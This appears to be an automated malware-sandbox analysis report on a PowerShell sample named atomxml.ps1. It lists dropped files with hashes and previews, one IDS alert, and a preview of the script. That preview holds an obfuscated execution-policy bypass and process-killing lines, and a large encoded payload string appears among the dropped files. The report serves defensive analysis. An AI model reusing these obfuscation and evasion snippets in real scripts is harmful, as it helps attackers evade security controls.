Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE54.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7628
Entropy (8bit):	3.706544054568231
Encrypted:	false
SSDEEP:	192:R6l7wVeJTx6G26Yg6SUOGKFgmfpgCpp1FD1fcXm:R6lXJl6n6YtSU5KFgmfaC1FxfB
MD5:	4FD2F7DB3ADC1B90D0A040E394253B0D
SHA1:	DF2A9F947ED1AD7732635071824C82692B342FFC
SHA-256:	78A07765B919E31F08DD0EB2574C337605DB823C48A41E2CF23FE77A1E4752C2
SHA-512:	753F465A59F6523A8B5265BB140396E14B65BDFC25F9340E350D240FFC9AFB690ACF9907BE357CD26E3B21991AD5AB13CF986808EB2B3A6EB0181D38360DAEEF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE65.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4614
Entropy (8bit):	4.49677499497271
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9puWpW8VYgYm8M4JFKf7QxiF6t/8z+q8LVs10nk8gbd:uIjfxI7bP7VYJFKCTmsrnk8gbd
MD5:	1126642EE5D0CF3F412CD361CE03DFB1
SHA1:	49E7B17E851EEB37E34A268D50548CF03C696814
SHA-256:	ADA953CF6A9676971913621416AA35FE7E0F6F1A72BA08364089ED2532BBA3FB
SHA-512:	6433D67A53E51ACC849721DEA1F2541254E72152DA4649006D7B433EE9F4F72CB0CDFA13AF42FE9A6082B228B697F4E0278A4F24D4B7D9AFFA26627CBA68BA81
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE93.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4614
Entropy (8bit):	4.486333371035275
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9puWpW8VY6Ym8M4JFKfVxiFlI+q8YsQGq8deqd:uIjfxI7bP7VeJFKH9Jl58dnd
MD5:	06F321A6AAD3D2594828B033EE4D7B61
SHA1:	C96AD1A222C292A8D9C87FD110937166D3A272A8
SHA-256:	963F9A86DF0996EBC9123B0DA83679F05F58BD9FBF564B2F413F412CA7BE23AC
SHA-512:	3D80FC67A7B90F1F75C7F10B3AE3D333F46EDBEA3CB67740C501F5D7B2C962248EE34A279FCEDD1F831DFB7601684294EC4B13E844C5421965ABC14B5EB36273
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFED1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7628
Entropy (8bit):	3.7082967638489674
Encrypted:	false
SSDEEP:	192:R6l7wVeJkA6Wb6Yg5SU1pgmf9Cpp18f1fEUm:R6lXJj6q6YuSULgmf9C18NfO
MD5:	D3DD8F7F29815BA2A614E158A104B8C0
SHA1:	98B6362D092F1B1C3D70F8775684B9D8564E2E11
SHA-256:	2C2AB5E41038BCD4DD6EEC2F5D047A72FE6A903DC1EA248098D5FB09F5B5011B
SHA-512:	0060167F4DA37095DC8F8309231EC739591749FD31F35ABEE65A318DC0DC61702CAC03BB1DF49B351EBFD5D869DC58549D55D40E4796A3814912EC888DCF8DB8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF01.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4614
Entropy (8bit):	4.499077076569831
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9puWpW8VYqVYm8M4JFKf7QxiFe+q8LVsDaUnk8g6d:uIjfxI7bP7VnkJFKCFsuXnk8g6d
MD5:	E89DD27580C852DADC7AB620666B7AA0
SHA1:	AF91EF07976CE535C6D2FA4A6BAC7A421DBA0DCB
SHA-256:	AC253C4702DAFDAF0806C748FD8AEEE576D9090AFF6052B60E101C8584FCB6BC
SHA-512:	063A2EE5847A027BA65847820BAAEFDD35D5B399C87EDE7B81DFEB1BF83C87F18E3D2781E50AB30307E9D28BD187D3BC2492C34E7EC4BF8F05E7C1D2E5749B2C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\nippleskulcha\aksodkaosdwwkkw.~!!@@!!@!!!!!!@!@@!!@@!@@!!@@!!~

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	4943899
Entropy (8bit):	2.833358725088608
Encrypted:	false
SSDEEP:	1536:/jQNfQ+x3hvx26vgn00oR/S7rLA5PTfw/mamYmDn+mnypbbMNmviUzuGMipZ3P1S:3Q
MD5:	D8BE4DE94EDB2A36C93D4F03681A69DC
SHA1:	C05BFA89E810BB1ED4C99E35F51BBF93DE16F2CB
SHA-256:	1DBF69B7D45843CAEAE42D07A422E3EFD9E8B47DF14DAA7F57466D29D780342E
SHA-512:	61F374B58B48D55B34D337ADA1C7EAC2333308F33197DAA03034C2F9322358E46B3A324CCD339BF2B70AC5D83C47EC4BA983DCF33473275962CA0FEF3291BA34
Malicious:	false
Preview:	$poppopmdabaomazyurao = "000000000000000411412563710530671021102710043743441652023311672602010720510320000423220373523423611502641733111543073001502712202731700053563772441520561063533601010461170363211451560102662253663570450310633562372521220451303743141733061120173450021532723612201632043412353610301500001713303701452562221510571432672100112701301642743332410100112340360331752650113353113340210211123251213373773000741510122702353303131742620702603760511423743013472170603642023472601452603310223052653361212463142201653263710610271302240132332771443130401450600510072751472001200143112730762333523022062511352702512130111663470021362322041101573622701063432102222413073601170770053741261470461310322203070673100061212533470102252453421171351313153552312420551143461130270722243721301463323650113350063531511171551060653462131633601551411350012441540362663672142372211142171561532373152511562273122622753040650301110340560721602253502222511442603542352241743670543443210251502223170251010160213

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	47721
Entropy (8bit):	5.074691086935296
Encrypted:	false
SSDEEP:	768:aUWIbV3IpNBQkj2Uh4iUxTaVLfrRJv5FPvlOZhsHvhCardFoJz7OdBYNmzqtAHkU:aU1bV3CNBQkj2Uh4iUxTaVLflJnPvlOY
MD5:	A6F227D3953690EE67C4850E94B7A89A
SHA1:	D24F88B64A4DF2803E3FBE0727B0B248158294F9
SHA-256:	A7BB4D3F8E67FA7220A892C02F3C2F87413C325E600EE1D7550ECE1097F2AFDA
SHA-512:	8C75308E04B306D454D86A84D8D5179085F3D614E449DA5DDAE958948E605900F023C336ECA01B42B1590C873E16B0FFCB41C30585833F840B66F104170EFFED
Malicious:	false
Preview:	PSMODULECACHE.I....zcL.z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mnjbemz.x20.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3022emlf.f1g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rpukjg1.ewx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41400ykg.z4f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i42zfsns.u22.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmgfwa01.nl5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0anv53d.yhm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvkio0gw.21m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7355739990681376
Encrypted:	false
SSDEEP:	96:PtCXY33CxHe6kvhkvCCt1kjrJsHikjrJHHm:P0XYy+21eve4
MD5:	25FD7FE7578A8720CD05BE7A9186406A
SHA1:	F7DFFFA1524C66BA918297F783CB4900959E31D3
SHA-256:	4903A817BFC1E7E5E4C3AA343335BF45B44FBF9A8A07BAC99B53DAAF66416BEB
SHA-512:	B63F03FC54107BCEB6A4626EBEF27F38FB6FF4A21A44B63CDE8C434386D426A5B3E154AD30204FB4AF7A76D678E321AFC131D1D6ACE00426747B725CFEBEF9B8
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.....U4c.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....L.^.a...hGc.a......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z.f...........................%..A.p.p.D.a.t.a...B.V.1.....(Z.f..Roaming.@......CW.^(Z.f............................j.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^(Z.f..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^(Z.f....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q747SGRI3K2I2YVN5EYG.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7355739990681376
Encrypted:	false
SSDEEP:	96:PtCXY33CxHe6kvhkvCCt1kjrJsHikjrJHHm:P0XYy+21eve4
MD5:	25FD7FE7578A8720CD05BE7A9186406A
SHA1:	F7DFFFA1524C66BA918297F783CB4900959E31D3
SHA-256:	4903A817BFC1E7E5E4C3AA343335BF45B44FBF9A8A07BAC99B53DAAF66416BEB
SHA-512:	B63F03FC54107BCEB6A4626EBEF27F38FB6FF4A21A44B63CDE8C434386D426A5B3E154AD30204FB4AF7A76D678E321AFC131D1D6ACE00426747B725CFEBEF9B8
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.....U4c.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....L.^.a...hGc.a......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z.f...........................%..A.p.p.D.a.t.a...B.V.1.....(Z.f..Roaming.@......CW.^(Z.f............................j.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^(Z.f..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^(Z.f....Q...........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469992578699426
Encrypted:	false
SSDEEP:	6144:5IXfpi67eLPU9skLmb0b4uWSPKaJG8nAgejZMMhA2gX4WABl0uNgdwBCswSbG:KXD94uWlLZMM6YFHu+G
MD5:	31943F704718633227A7B743F9CC69F4
SHA1:	821482235E5C2C8F7344CAF90CEE33EE579062B8
SHA-256:	E66C98459405D550F50CEBC1292AD0D2C8D70D931AC11186C9E060FC6E273FFD
SHA-512:	1AC0434F6F3223D1A097FBEE000D0028637F86E2ACCA9C554784497B663E3215FF7E81BD206D121D5C577A53B6E36BFF62D7D4F8ADBD2D02D635972A01786166
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..{..a................................................................................................................................................................................................................................................................................................................................................m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65069)
Entropy (8bit):	2.8419010011053896
TrID:
File name:	atomxml.ps1
File size:	4'951'516 bytes
MD5:	b21f207101abbbb84b30dfffb68c53e5
SHA1:	7d93785d0f1e1eed991b1b8209acec8abbb5cedb
SHA256:	d82cadfdd5c7611fc25978f7c500de4bb32a11ef202bc972c83a0815e625da66
SHA512:	1a6fd8b4823f904d61d9df9228c7568017369c086107719e9dc65f66b2cadd220e072e6c658fce289a85f26a0ed1df160a632bf9726e4565e238fc38d1aea04b
SSDEEP:	1536:XjQNfQ+x3hvx26vgn00oR/S7rLA5PTfw/mamYmDn+mnypbbMNmviUzuGMipZ3P1u:fqp
TLSH:	7B36BEA85FCC7490F80ED65196B4BC7E523335E756D2890D0364BED12F82BBAAB148CD
File Content Preview:	& ([char[]](83,101,116,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121) -join '') `.-Scope CurrentUser Bypass -Force..@("RegSvcs", "mshta", "wscript", "msbuild") \| ForEach-Object {. Get-Process -Name $_ -ErrorAction SilentlyContinue \| Stop-P

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T13:55:17.966589+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49845	142.250.185.225	443	TCP
